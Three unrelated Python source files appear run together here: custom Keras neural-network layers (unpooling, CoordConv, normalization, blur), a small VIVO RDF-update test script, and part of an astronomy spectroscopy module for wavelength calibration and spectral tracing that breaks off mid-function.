feature_shape = input_shape[0]
else:
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, feature_shape[-1]*self.depth_multiplier]
return feature_shape
def get_config(self):
config = super(DepthwiseConv2D, self).get_config()
config.update({
'depth_multiplier': self.depth_multiplier,
})
return config
class MaxPoolingWithArgmax2D(Layer):
'''MaxPooling for unpooling with indices.
# References
[SegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation](http://arxiv.org/abs/1511.00561)
# related code:
https://github.com/PavlosMelissinos/enet-keras
https://github.com/ykamikawa/SegNet
'''
def __init__(self, pool_size=(2, 2), strides=(2, 2), padding='same', **kwargs):
super(MaxPoolingWithArgmax2D, self).__init__(**kwargs)
self.pool_size = conv_utils.normalize_tuple(pool_size, 2, 'pool_size')
self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
self.padding = conv_utils.normalize_padding(padding)
def call(self, inputs, **kwargs):
ksize = [1, self.pool_size[0], self.pool_size[1], 1]
strides = [1, self.strides[0], self.strides[1], 1]
padding = self.padding.upper()
output, argmax = nn_ops.max_pool_with_argmax(inputs, ksize, strides, padding)
argmax = tf.cast(argmax, K.floatx())
return [output, argmax]
def compute_output_shape(self, input_shape):
ratio = (1, 2, 2, 1)
output_shape = [dim // ratio[idx] if dim is not None else None for idx, dim in enumerate(input_shape)]
output_shape = tuple(output_shape)
return [output_shape, output_shape]
def compute_mask(self, inputs, mask=None):
return 2 * [None]
def get_config(self):
config = super(MaxPoolingWithArgmax2D, self).get_config()
config.update({
'pool_size': self.pool_size,
'strides': self.strides,
'padding': self.padding,
})
return config
class MaxUnpooling2D(Layer):
'''Inversion of MaxPooling with indices.
# References
[SegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation](http://arxiv.org/abs/1511.00561)
# related code:
https://github.com/PavlosMelissinos/enet-keras
https://github.com/ykamikawa/SegNet
'''
def __init__(self, size=(2, 2), **kwargs):
super(MaxUnpooling2D, self).__init__(**kwargs)
self.size = conv_utils.normalize_tuple(size, 2, 'size')
def call(self, inputs, output_shape=None):
updates, mask = inputs[0], inputs[1]
mask = tf.cast(mask, 'int32')
input_shape = tf.shape(updates, out_type='int32')
# calculation new shape
if output_shape is None:
output_shape = (input_shape[0], input_shape[1] * self.size[0], input_shape[2] * self.size[1], input_shape[3])
# calculation indices for batch, height, width and feature maps
one_like_mask = K.ones_like(mask, dtype='int32')
batch_shape = K.concatenate([[input_shape[0]], [1], [1], [1]], axis=0)
batch_range = K.reshape(tf.range(output_shape[0], dtype='int32'), shape=batch_shape)
b = one_like_mask * batch_range
y = mask // (output_shape[2] * output_shape[3])
x = (mask // output_shape[3]) % output_shape[2]
feature_range = tf.range(output_shape[3], dtype='int32')
f = one_like_mask * feature_range
# transpose indices & reshape update values to one dimension
updates_size = tf.size(updates)
indices = K.transpose(K.reshape(K.stack([b, y, x, f]), [4, updates_size]))
values = K.reshape(updates, [updates_size])
ret = tf.scatter_nd(indices, values, output_shape)
return ret
def compute_output_shape(self, input_shape):
mask_shape = input_shape[1]
output_shape = [mask_shape[0], mask_shape[1] * self.size[0], mask_shape[2] * self.size[1], mask_shape[3]]
return tuple(output_shape)
def get_config(self):
config = super(MaxUnpooling2D, self).get_config()
config.update({
'size': self.size,
})
return config
class AddCoords2D(Layer):
"""Add coords to a tensor as described in CoordConv paper.
# Arguments
with_r: Boolean flag, whether the r coordinate is added or not. See paper for more details.
# Input shape
featurs: 4D tensor with shape (batch_size, rows, cols, channels)
# Output shape
featurs: same as input except channels + 2, channels + 3 if with_r is True
# Example
x = Conv2D(32, 3, padding='same', activation='relu')(x)
x = AddCoords2D()(x)
x = Conv2D(32, 3, padding='same', activation='relu')(x)
# Notes
Semi-convolutional Operators is an approach that is closely related to CoordConv.
# References
[An Intriguing Failing of Convolutional Neural Networks and the CoordConv Solution](http://arxiv.org/abs/1807.03247)
[Semi-convolutional Operators for Instance Segmentation](https://arxiv.org/abs/1807.10712)
"""
def __init__(self, with_r=False, **kwargs):
super(AddCoords2D, self).__init__(**kwargs)
self.with_r = with_r
def call(self, features):
y_dim = features.shape[1]
x_dim = features.shape[2]
ones = tf.ones_like(features[:,:,:,:1])
y_range = tf.range(y_dim, dtype='float32') / tf.cast(y_dim-1, 'float32') * 2 - 1
x_range = tf.range(x_dim, dtype='float32') / tf.cast(x_dim-1, 'float32') * 2 - 1
yy = ones * y_range[None, :, None, None]
xx = ones * x_range[None, None, :, None]
if self.with_r:
rr = tf.sqrt(tf.square(yy-0.5) + tf.square(xx-0.5))
features = tf.concat([features, yy, xx, rr], axis=-1)
else:
features = tf.concat([features, yy, xx], axis=-1)
return features
def compute_output_shape(self, input_shape):
output_shape = list(input_shape)
output_shape[3] = output_shape[3] + 2
if self.with_r:
output_shape[3] = output_shape[3] + 1
return tuple(output_shape)
def get_config(self):
config = super(AddCoords2D, self).get_config()
config.update({
'with_r': self.with_r,
})
return config
class LayerNormalization(Layer):
"""Layer Normalization Layer.
# References
[Layer Normalization](http://arxiv.org/abs/1607.06450)
"""
def __init__(self, eps=1e-6, **kwargs):
super(LayerNormalization, self).__init__(**kwargs)
self.eps = eps
def build(self, input_shape):
self.gamma = self.add_weight(name='gamma', shape=input_shape[-1:],
initializer=initializers.Ones(), trainable=True)
self.beta = self.add_weight(name='beta', shape=input_shape[-1:],
initializer=initializers.Zeros(), trainable=True)
super(LayerNormalization, self).build(input_shape)
def call(self, x):
mean = tf.stop_gradient(K.mean(x, axis=-1, keepdims=True))
std = tf.stop_gradient(K.std(x, axis=-1, keepdims=True))
return self.gamma * (x - mean) / (std + self.eps) + self.beta
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = super(LayerNormalization, self).get_config()
config.update({
'eps': self.eps,
})
return config
class InstanceNormalization(Layer):
"""Instance Normalization Layer.
# References
[Instance Normalization: The Missing Ingredient for Fast Stylization](https://arxiv.org/abs/1607.08022)
"""
def __init__(self, eps=1e-6, **kwargs):
super(InstanceNormalization, self).__init__(**kwargs)
self.eps = eps
def build(self, input_shape):
self.gamma = self.add_weight(name='gamma', shape=input_shape[-1:],
initializer=initializers.Ones(), trainable=True)
self.beta = self.add_weight(name='beta', shape=input_shape[-1:],
initializer=initializers.Zeros(), trainable=True)
super(InstanceNormalization, self).build(input_shape)
def call(self, x):
axis = list(range(len(x.shape))[1:-1])
mean = tf.stop_gradient(K.mean(x, axis=axis, keepdims=True))
std = tf.stop_gradient(K.std(x, axis=axis, keepdims=True))
return self.gamma * (x - mean) / (std + self.eps) + self.beta
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = super(InstanceNormalization, self).get_config()
config.update({
'eps': self.eps,
})
return config
def Resize2D(size, method='bilinear'):
"""Spatial resizing layer.
# Arguments
size: spatial output size (rows, cols)
method: 'bilinear', 'bicubic', 'nearest', ...
"""
return Lambda(lambda x: tf.image.resize(x, size, method=method))
class Blur2D(Layer):
"""2D Blur Layer as used in Antialiased CNNs for Subsampling.
# Notes
The layer handles boundary effects similar to AvgPool2D.
# References
[Making Convolutional Networks Shift-Invariant Again](https://arxiv.org/abs/1904.11486)
# related code
https://github.com/adobe/antialiased-cnns
https://github.com/adobe/antialiased-cnns/issues/10
"""
def __init__(self, filter_size=3, strides=2, padding='valid', **kwargs):
rank = 2
self.filter_size = filter_size
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if self.filter_size == 1:
self.a = np.array([1.,])
elif self.filter_size == 2:
self.a = np.array([1., 1.])
elif self.filter_size == 3:
self.a = np.array([1., 2., 1.])
elif self.filter_size == 4:
self.a = np.array([1., 3., 3., 1.])
elif self.filter_size == 5:
self.a = np.array([1., 4., 6., 4., 1.])
elif self.filter_size == 6:
self.a = np.array([1., 5., 10., 10., 5., 1.])
elif self.filter_size == 7:
self.a = np.array([1., 6., 15., 20., 15., 6., 1.])
super(Blur2D, self).__init__(**kwargs)
def compute_output_shape(self, input_shape):
feature_shape = input_shape
space = feature_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
feature_shape = [feature_shape[0], *new_space, feature_shape[3]]
return feature_shape
def build(self, input_shape):
k = self.a[:,None] * self.a[None,:]
k = np.tile(k[:,:,None,None], (1,1,input_shape[-1],1))
self.kernel = K.constant(k, dtype=K.floatx())
def call(self, x):
features = K.depthwise_conv2d(x, self.kernel, strides=self.strides, padding=self.padding)
# normalize the features
mask = tf.ones_like(x)
norm = K.depthwise_conv2d(mask, self.kernel, strides=self.strides, padding=self.padding)
features = tf.multiply(features, 1./norm)
return features
def get_config(self):
config = super(Blur2D, self).get_config()
config.update({
'filter_size': self.filter_size,
'strides': self.strides,
'padding': self.padding,
})
return config
class Scale(Layer):
"""Layer to learn a affine feature scaling.
"""
def __init__(self,
use_shift=True,
use_scale=True,
shift_initializer='zeros',
shift_regularizer=None,
shift_constraint=None,
scale_initializer='ones',
scale_regularizer=None,
scale_constraint=None,
**kwargs):
super(Scale, self).__init__(**kwargs)
self.use_shift = use_shift
self.use_scale = use_scale
self.shift_initializer = initializers.get(shift_initializer)
self.shift_regularizer = regularizers.get(shift_regularizer)
self.shift_constraint = constraints.get(shift_constraint)
self.scale_initializer = initializers.get(scale_initializer)
self.scale_regularizer = regularizers.get(scale_regularizer)
self.scale_constraint = constraints.get(scale_constraint)
def compute_output_shape(self, input_shape):
return input_shape
def build(self, input_shape):
if self.use_shift:
self.shift = self.add_variable(name='shift',
shape=(input_shape[-1],),
initializer=self.shift_initializer,
regularizer=self.shift_regularizer,
constraint=self.shift_constraint,
trainable=True,
dtype=self.dtype)
else:
self.shfit = None
if self.use_scale:
self.scale = self.add_variable(name='scale',
shape=(input_shape[-1],),
initializer=self.scale_initializer,
regularizer=self.scale_regularizer,
constraint=self.scale_constraint,
trainable=True,
dtype=self.dtype)
else:
self.scale = None
super(Scale, self).build(input_shape)
def call(self, inputs, **kwargs):
x = inputs
if self.use_scale:
x = tf.multiply(x, self.scale)
if self.use_shift:
x = tf.add(x, self.shift)
return x
def get_config(self):
config = super(Scale, self).get_config()
config.update({
'use_shift': self.use_shift,
'use_scale': self.use_scale,
'shift_initializer': initializers.serialize(self.shift_initializer),
'shift_regularizer': regularizers.serialize(self.shift_regularizer),
'shift_constraint': constraints.serialize(self.shift_constraint),
'scale_initializer': initializers.serialize(self.scale_initializer),
'scale_regularizer': regularizers.serialize(self.scale_regularizer),
'scale_constraint': constraints.serialize(self.scale_constraint),
})
return config
| 55,219 | 16,881 |
"""
test_update_resource_property.py -- Given a VIVO URI, a predicate, and two
URIs -- VIVO resource URI and the source URI, generate the add and subtract
RDF necessary to execute "five case logic" in updating VIVO with an
authoritative source URI.
Note. In common use, the source data is presented with a "key" value, not
a URI. The key value must be translated using a dictionary to a URI. For
example, a person might be referred to in source data via a UFID. The
UFID is translated to a URI using a UFID dictionary.
Version 0.1 MC 2013-12-27
-- Initial version.
"""
__author__ = "Michael Conlon"
__copyright__ = "Copyright 2013, University of Florida"
__license__ = "BSD 3-Clause license"
__version__ = "0.1"
import vivotools as vt
from datetime import datetime
print datetime.now(),"Start"
cases = {
"1. VIVO has A, Source Has B": ["A","B"],
"2. VIVO has A and Source also has A": ["A","A"],
"3. VIVO has A, source has no value": ["A",None],
"4. VIVO has no value, Source has B": [None,"B"],
"5. VIVO has no value and Source also has no value": [None,None]
}
for case in sorted(cases.keys()):
print "\n",case,":"
[vivo,source] = cases[case]
[add,sub] = vt.update_resource_property("http://vivo.uri","http://pred.uri",
vivo,source)
print " Add:"
print add
print " Subtract:"
print sub
print datetime.now(),"Finish"
| 1,488 | 488 |
import matplotlib
import matplotlib.pyplot as plt
import os
import pdb
import pickle
import copy
import scipy.signal
import scipy.interpolate
import numpy as np
from astropy.modeling import models, fitting
from astropy.nddata import CCDData, StdDevUncertainty
from astropy.io import ascii, fits
from astropy.convolution import convolve, Box1DKernel, Box2DKernel
import pyvista
from pyvista import image
from pyvista import tv
from tools import plots
ROOT = os.path.dirname(os.path.abspath(__file__)) + '/../../'
class SpecData(CCDData) :
""" Class to include a wavelength array on top of CCDData, with simple read/write/plot methods
"""
def __init__(self,data,wave=None) :
if type(data) is str :
hdulist=fits.open(data)
self.meta = hdulist[0].header
self.unit = hdulist[0].header['BUNIT']
self.data = hdulist[1].data
self.uncertainty = StdDevUncertainty(hdulist[2].data)
self.mask = hdulist[3].data
self.wave = hdulist[4].data
elif type(data) is CCDData :
self.unit = data.unit
self.meta = data.meta
self.data = data.data
self.uncertainty = data.uncertainty
self.mask = data.mask
self.wave = wave
else :
print('Input must be a filename or CCDData object')
def write(self,file,overwrite=True) :
hdulist=fits.HDUList()
hdulist.append(fits.PrimaryHDU(header=self.meta))
hdulist.append(fits.ImageHDU(self.data))
hdulist.append(fits.ImageHDU(self.uncertainty.array))
hdulist.append(fits.ImageHDU(self.mask.astype(np.int16)))
hdulist.append(fits.ImageHDU(self.wave))
hdulist.writeto(file,overwrite=overwrite)
def plot(self,ax,**kwargs) :
for row in range(self.wave.shape[0]) :
gd = np.where(self.mask[row,:] == False)[0]
plots.plotl(ax,self.wave[row,gd],self.data[row,gd],**kwargs)
def get_wavecal(file) :
""" load a wavecal object from disk file
"""
with open(file,'rb') as wavecal :
return pickle.load(wavecal)
class WaveCal() :
""" Class for wavelength solutions
"""
def __init__ (self,type='chebyshev',degree=2,ydegree=2,pix0=0,orders=[1]) :
""" Initialize the wavecal object
type : type of solution ('poly' or 'chebyshev')
degree : polynomial degree for wavelength
ydegree : polynomial degree for y dimension
pix0 : reference pixel
orders : spectral order for each row
spectrum : spectrum from which fit is derived
"""
self.type = type
self.degree = degree
self.ydegree = ydegree
self.pix0 = pix0
self.orders = orders
self.waves = None
self.x = None
self.y = None
self.weights = None
self.model = None
self.ax = None
def wave(self,pixels=None,image=None) :
""" Wavelength from pixel using wavelength solution model
pix : input pixel positions [x] or [y,x]
image : for input image size [nrows,ncols], return wavelengths at all pixels
returns wavelength
"""
if pixels is not None :
out=np.zeros(len(pixels[0]))
for i,pixel in enumerate(pixels[0]) :
if self.type.find('2D') > 0 :
order=self.orders[pixels[1][i]]
out[i]=self.model(pixel-self.pix0,pixels[1][i])/order
else :
out[i]=self.model(pixel-self.pix0)/self.orders[0]
return out
else :
out=np.zeros(image)
cols=np.arange(out.shape[-1])
if out.ndim == 2 :
for row in range(out.shape[0]) :
rows=np.zeros(len(cols))+row
try : order = self.orders[row]
except : order=self.orders[0]
out[row,:] = self.model(cols-self.pix0,rows)/order
else :
out= self.model(cols-self.pix0)/self.orders[0]
return out
def getmod(self) :
""" Return model for current attributes
"""
if self.type == 'poly' :
mod=models.Polynomial1D(degree=self.degree)
elif self.type == 'chebyshev' :
mod=models.Chebyshev1D(degree=self.degree)
elif self.type == 'chebyshev2D' :
sz=self.spectrum.data.shape
mod=models.Chebyshev2D(x_degree=self.degree,y_degree=self.ydegree,
x_domain=[0,sz[1]],y_domain=[0,sz[0]])
else :
raise ValueError('unknown fitting type: '+self.type)
return
return mod
def fit(self,plot=True) :
""" do a wavelength fit
"""
print("doing wavelength fit")
# set up fitter and model
twod='2D' in self.type
fitter=fitting.LinearLSQFitter()
mod = self.getmod()
if not hasattr(self,'ax') : self.ax = None
if twod :
nold=-1
nbd=0
while nbd != nold :
nold=nbd
self.model=fitter(mod,self.pix-self.pix0,self.y,self.waves*self.waves_order,weights=self.weights)
diff=self.waves-self.wave(pixels=[self.pix,self.y])
gd = np.where(self.weights > 0)[0]
print(' rms: {:8.3f}'.format(diff[gd].std()))
bd = np.where(abs(diff) > 3*diff.std())[0]
nbd = len(bd)
print('rejecting {:d} points from {:d} total: '.format(nbd,len(self.waves)))
self.weights[bd] = 0.
if self.ax is not None :
self.ax[1].cla()
scat=self.ax[1].scatter(self.waves,diff,marker='o',c=self.y,s=2)
scat=self.ax[1].scatter(self.waves[bd],diff[bd],marker='o',c='r',s=2)
xlim=self.ax[1].get_xlim()
self.ax[1].set_ylim(diff.min()-0.5,diff.max()+0.5)
self.ax[1].plot(xlim,[0,0],linestyle=':')
self.ax[1].text(0.1,0.9,'rms: {:8.3f}'.format(diff[gd].std()),transform=self.ax[1].transAxes)
cb_ax = self.fig.add_axes([0.94,0.05,0.02,0.4])
cb = self.fig.colorbar(scat,cax=cb_ax)
cb.ax.set_ylabel('Row')
plt.draw()
self.fig.canvas.draw_idle()
input(' See 2D wavecal fit. Hit any key to continue....')
else :
self.model=fitter(mod,self.pix-self.pix0,self.waves*self.waves_order,weights=self.weights)
diff=self.waves-self.wave(pixels=[self.pix])
print(' rms: {:8.3f} Angstroms'.format(diff.std()))
if self.ax is not None :
# iterate allowing for interactive removal of points
done = False
ymax = self.ax[0].get_ylim()[1]
while not done :
# do fit
gd=np.where(self.weights>0.)[0]
bd=np.where(self.weights<=0.)[0]
self.model=fitter(mod,self.pix[gd]-self.pix0,self.waves[gd]*self.waves_order[gd],weights=self.weights[gd])
diff=self.waves-self.wave(pixels=[self.pix])
print(' rms: {:8.3f} Anstroms'.format(diff[gd].std()))
# replot spectrum with new fit wavelength scale
self.ax[0].cla()
self.ax[0].plot(self.wave(image=self.spectrum.data.shape)[0,:],self.spectrum.data[0,:])
# plot residuals
self.ax[1].cla()
self.ax[1].plot(self.waves[gd],diff[gd],'go')
self.ax[1].text(0.1,0.9,'rms: {:8.3f} Angstroms'.format(diff[gd].std()),transform=self.ax[1].transAxes)
self.ax[1].set_xlabel('Wavelength')
self.ax[1].set_ylabel('obs wave - fit wave')
if len(bd) > 0 : self.ax[1].plot(self.waves[bd],diff[bd],'ro')
self.ax[1].set_ylim(diff[gd].min()-0.5,diff[gd].max()+0.5)
for i in range(len(self.pix)) :
self.ax[1].text(self.waves[i],diff[i],'{:2d}'.format(i),va='top',ha='center')
if self.weights[i] > 0 :
self.ax[0].plot([self.waves[i],self.waves[i]],[0,ymax],'g')
else :
self.ax[0].plot([self.waves[i],self.waves[i]],[0,ymax],'r')
plt.draw()
# get input from user on lines to remove
for i in range(len(self.pix)) :
print('{:3d}{:8.2f}{:8.2f}{:8.2f}{:8.2f}'.format(
i, self.pix[i], self.waves[i], diff[i], self.weights[i]))
i = input(' enter ID of line to remove (-n for all lines<n, +n for all lines>n, O for new degree, return to continue): ')
if i == '' :
done = True
elif i == 'O' :
print(' current degree of fit: {:d}'.format(self.degree))
self.degree = int(input(' enter new degree of fit: '))
mod = self.getmod()
elif '+' in i :
self.weights[int(i)+1:] = 0.
elif '-' in i :
self.weights[0:abs(int(i))] = 0.
elif int(i) >= 0 :
self.weights[int(i)] = 0.
else :
print('invalid input')
def set_spectrum(self,spectrum) :
""" Set spectrum used to derive fit
"""
self.spectrum = np.atleast_2d(spectrum)
def get_spectrum(self) :
""" Set spectrum used to derive fit
"""
return self.spectrum
def identify(self,spectrum,file=None,wav=None,wref=None,disp=None,display=None,plot=None,rad=5,thresh=10,
xmin=None, xmax=None, lags=range(-300,300), nskip=1) :
""" Given some estimate of wavelength solution and file with lines,
identify peaks and centroid
"""
sz=spectrum.shape
if len(sz) == 1 :
spectrum.data = np.atleast_2d(spectrum.data)
spectrum.uncertainty.array = np.atleast_2d(spectrum.uncertainty.array)
sz=spectrum.shape
if xmin is None : xmin=0
if xmax is None : xmax=sz[-1]
nrow=sz[0]
# get initial reference wavelengths if not given
if wav is None :
pix=np.arange(sz[-1])
if self.spectrum is not None :
# cross correlate with reference image to get pixel shift
print(' cross correlating with reference spectrum using lags: ', lags)
fitpeak,shift = image.xcorr(self.spectrum.data,spectrum.data,lags)
if shift.ndim == 1 :
pixshift=(fitpeak+lags[0])[0]
print(' Derived pixel shift from input wcal: ',fitpeak+lags[0])
if display is not None :
display.plotax1.cla()
display.plotax1.text(0.05,0.95,'spectrum and reference',transform=display.plotax1.transAxes)
for row in range(spectrum.data.shape[0]) :
display.plotax1.plot(spectrum.data[row,:],color='m')
display.plotax1.plot(self.spectrum.data[row,:],color='g')
display.plotax1.set_xlabel('Pixel')
display.plotax2.cla()
display.plotax2.text(0.05,0.95,'cross correlation: {:8.3f}'.format(pixshift),
transform=display.plotax2.transAxes)
display.plotax2.plot(lags,shift)
display.plotax1.set_xlabel('Lag')
plt.draw()
input(" See spectrum and template spectrum (top), cross corrleation(bottom). hit any key to continue")
# single shift for all pixels
self.pix0 = self.pix0+fitpeak+lags[0]
wav=np.atleast_2d(self.wave(image=np.array(sz)))
else :
# different shift for each row
wav=np.zeros(sz)
cols = np.arange(sz[-1])
orders=[]
for row in range(wav.shape[0]) :
print(' Derived pixel shift from input wcal for row: {:d} {:d}'.format
(row,shift[row,:].argmax()+lags[0]),end='\r')
rows=np.zeros(len(cols))+row
try : order = self.orders[row]
except : order=self.orders[0]
orders.append(order)
pix0 = self.pix0+fitpeak[row]+lags[0]
wav[row,:] = self.model(cols-pix0)/order
# ensure we have 2D fit
self.type = 'chebyshev2D'
self.orders = orders
print("")
else :
# get dispersion guess from header cards if not given in disp
if disp is None: disp=hd.header['DISPDW']
if wref is not None :
w0=wref[0]
pix0=wref[1]
else:
w0=hd.header['DISPWC']
pix0=sz[1]/2
wav=np.atleast_2d(w0+(pix-pix0)*disp)
# open file with wavelengths and read
if file is not None :
f=open(ROOT+'/data/lamps/'+file,'r')
lines=[]
for line in f :
if line[0] != '#' :
w=float(line.split()[0])
# if we have microns, convert to Angstroms
if w<10 : w*=10000
if w > wav.min() and w < wav.max() : lines.append(w)
lines=np.array(lines)
f.close()
else :
lines = self.waves
weights = self.weights
gd = np.where(weights >0)[0]
lines = lines[gd]
# get centroid around expected lines
x=[]
y=[]
waves=[]
waves_order=[]
weight=[]
diff=[]
if display is not None and isinstance(display,pyvista.tv.TV) :
display.ax.cla()
display.ax.axis('off')
display.tv(spectrum.data)
if plot is not None :
if type(plot) is matplotlib.figure.Figure :
plot.clf()
plt.draw()
ax1=plot.add_subplot(2,1,1)
ax2=plot.add_subplot(2,1,2,sharex=ax1)
plot.subplots_adjust(left=0.05,right=0.92, hspace=1.05)
ax=[ax1,ax2]
self.fig = plot
self.ax = ax
else :
fig,ax = plt.subplots(2,1,sharex=True,figsize=(14,7))
fig.subplots_adjust(hspace=1.05)
self.fig = fig
self.ax = ax
if plot is not None : ax[0].cla()
for row in range(0,nrow,nskip) :
print(' identifying lines in row: ', row,end='\r')
if plot is not None :
ax[0].plot(wav[row,:],spectrum.data[row,:])
#ax[0].set_yscale('log')
ax[0].set_ylim(1.,ax[0].get_ylim()[1])
ax[0].text(0.1,0.9,'row: {:d}'.format(row),transform=ax[0].transAxes)
ax[0].set_xlabel('Rough wavelength')
ax[0].set_ylabel('Intensity')
for line in lines :
peak=abs(line-wav[row,:]).argmin()
if isinstance(display,pyvista.tv.TV) :
if (peak > xmin+rad) and (peak < xmax-rad) : display.ax.scatter(peak,row,marker='o',color='r',s=2)
if ( (peak > xmin+rad) and (peak < xmax-rad) and
((spectrum.data[row,peak-rad:peak+rad]/spectrum.uncertainty.array[row,peak-rad:peak+rad]).max() > thresh) ) :
cent = (spectrum.data[row,peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spectrum.data[row,peak-rad:peak+rad].sum()
peak = int(cent)
cent = (spectrum.data[row,peak-rad:peak+rad]*np.arange(peak-rad,peak+rad)).sum()/spectrum.data[row,peak-rad:peak+rad].sum()
if display is not None and isinstance(display,pyvista.tv.TV) :
display.ax.scatter(cent,row,marker='o',color='g',s=2)
if plot is not None :
ax[0].text(line,1.,'{:7.1f}'.format(line),rotation='vertical',va='top',ha='center')
x.append(cent)
y.append(row)
# we will fit for wavelength*order
waves.append(line)
try: order = self.orders[row]
except: order=self.orders[0]
waves_order.append(order)
weight.append(1.)
if plot is not None :
if self.model is not None :
# if we have a solution already, see how good it is (after shift)
diff=self.wave(pixels=[x,y])-np.array(waves)
ax[1].cla()
ax[1].scatter(np.array(waves),diff,s=2,c=y)
ax[1].text(0.1,0.9,'from previous fit, rms: {:8.3f}'.format(diff.std()),transform=ax[1].transAxes)
xlim=ax[1].get_xlim()
ax[1].plot(xlim,[0,0],linestyle=':')
ax[1].set_ylim(diff.min()-0.5,diff.max()+0.5)
print(" rms from old fit (with shift): {:8.3f}".format(diff.std()))
plt.figure(plot.number)
plt.draw()
input(' See identified lines. hit any key to continue....')
self.pix=np.array(x)
self.y=np.array(y)
self.waves=np.array(waves)
self.waves_order=np.array(waves_order)
self.weights=np.array(weight)
self.spectrum = spectrum
print('')
def scomb(self,hd,wav,average=True,usemask=True) :
""" Resample onto input wavelength grid
"""
#output grid
out=np.zeros(len(wav))
sig=np.zeros(len(wav))
mask=np.zeros(len(wav),dtype=bool)
# raw wavelengths
w=self.wave(image=np.array(np.atleast_2d(hd.data).shape))
for i in range(np.atleast_2d(hd).shape[0]) :
sort=np.argsort(w[i,:])
if usemask :
gd = np.where(~hd.mask[i,sort])
sort= sort[gd]
wmin=w[i,sort].min()
wmax=w[i,sort].max()
w2=np.abs(wav-wmin).argmin()
w1=np.abs(wav-wmax).argmin()
if average :
out[w2:w1] += ( np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.data)[i,sort]) /
np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array)[i,sort])**2 )
sig[w2:w1] += 1./np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array)[i,sort])**2
else :
out[w2:w1] += np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.data)[i,sort])
sig[w2:w1] += np.interp(wav[w2:w1],w[i,sort],np.atleast_2d(hd.uncertainty.array**2)[i,sort])
if average :
out = out / sig
else :
sig = np.sqrt(sig)
return CCDData(out,uncertainty=StdDevUncertainty(sig),mask=mask,header=hd.header,unit='adu')
def save(self,file) :
""" Save object to file
"""
try : delattr(self,'fig')
except: pass
try : delattr(self,'ax')
except: pass
f=open(file,'wb')
pickle.dump(self,f)
f.close()
class Trace() :
""" Class for spectral traces
"""
def __init__ (self,inst=None, type='poly',order=2,pix0=0,rad=5,spectrum=None,model=None,sc0=None,rows=None,lags=None,channel=None) :
self.type = type
self.order = order
self.pix0 = pix0
self.spectrum = spectrum
self.rad = rad
if inst == 'TSPEC' :
self.order = 3
self.rows = [[135,235],[295,395],[435,535],[560,660],[735,830]]
self.lags = range(-75,75)
elif inst == 'DIS' :
if channel == 0 : self.rows=[[215,915]]
elif channel == 1 : self.rows=[[100,800]]
else : raise ValueError('need to specify channel')
self.lags = range(-300,300)
elif inst == 'ARCES' :
self.lags = range(-10,10)
if rows is not None : self.rows=rows
if lags is not None : self.lags=lags
if model is not None : self.model=model
if sc0 is not None : self.sc0=sc0
def trace(self,hd,srows,sc0=None,plot=None,thresh=20) :
""" Trace a spectrum from starting position
"""
fitter=fitting.LinearLSQFitter()
if self.type == 'poly' :
mod=models.Polynomial1D(degree=self.order)
else :
raise ValueError('unknown fitting type: '+self.type)
return
nrow = hd.data.shape[0]
ncol = hd.data.shape[1]
if sc0 is None : self.sc0 = int(ncol/2)
else : self.sc0 = sc0
self.spectrum = hd[:,self.sc0]
self.spectrum.data[self.spectrum.data<0] = 0.
rows = np.arange(nrow)
ypos = np.zeros(ncol)
ysum = np.zeros(ncol)
yvar = np.zeros(ncol)
ymask = np.zeros(ncol,dtype=bool)
# we want to handle multiple traces, so make sure srows is iterable
if type(srows ) is int or type(srows) is float : srows=[srows]
oldmodel=copy.copy(self.model)
self.model=[]
if plot is not None :
plot.clear()
plot.tv(hd)
rad = self.rad-1
for irow,srow in enumerate(srows) :
print(' Tracing row: {:d}'.format(int(srow)),end='\r')
sr=copy.copy(srow)
sr=int(round(sr))
sr=hd.data[sr-rad:sr+rad+1,self.sc0].argmax()+sr-rad
# march left from center
for col in range(self.sc0,0,-1) :
# centroid
cr=sr-rad+hd.data[sr-rad:sr+rad+1,col].argmax()
ysum[col] = np.sum(hd.data[cr-rad:cr+rad+1,col])
ypos[col] = np.sum(rows[cr-rad:cr+rad+1]*hd.data[cr-rad:cr+rad+1,col]) / ysum[col]
yvar[col] = np.sum(hd.uncertainty.array[cr-rad:cr+rad+1,col]**2)
ymask[col] = np.any(hd.mask[cr-rad:cr+rad+1,col])
# if centroid is too far from starting guess, mask as bad
if np.abs(ypos[col]-sr) > rad/2. : ymask[col] = True
# use this position as starting center for next if above threshold S/N
if (not ymask[col]) & np.isfinite(ysum[col]) & (ysum[col]/np.sqrt(yvar[col]) > thresh) : sr=int(round(ypos[col]))
sr=copy.copy(srow)
sr=int(round(sr))
sr=hd.data[sr-rad:sr+rad+1,self.sc0].argmax()+sr-rad
# march right from center
for col in range(self.sc0+1,ncol,1) :
# centroid
cr=sr-rad+hd.data[sr-rad:sr+rad+1,col].argmax()
ysum[col] = np.sum(hd.data[cr-rad:cr+rad+1,col])
ypos[col] = np.sum(rows[cr-rad:cr+rad+1]*hd.data[cr-rad:cr+rad+1,col]) / ysum[col]
yvar[col] = np.sum(hd.uncertainty.array[cr-rad:cr+rad+1,col]**2)
ymask[col] = np.any(hd.mask[cr-rad:cr+rad+1,col])
if np.abs(ypos[col]-sr) > rad/2. : ymask[col] = True
# use this position as starting center for next if above threshold S/N
if (not ymask[col]) & np.isfinite(ysum[col]) & (ysum[col]/np.sqrt(yvar[col]) > thresh) : sr=int(round(ypos[col]))
cols=np.arange(ncol)
gd = np.where((~ymask) & (ysum/np.sqrt(yvar)>thresh) )[0]
model=(fitter(mod,cols[gd],ypos[gd]))
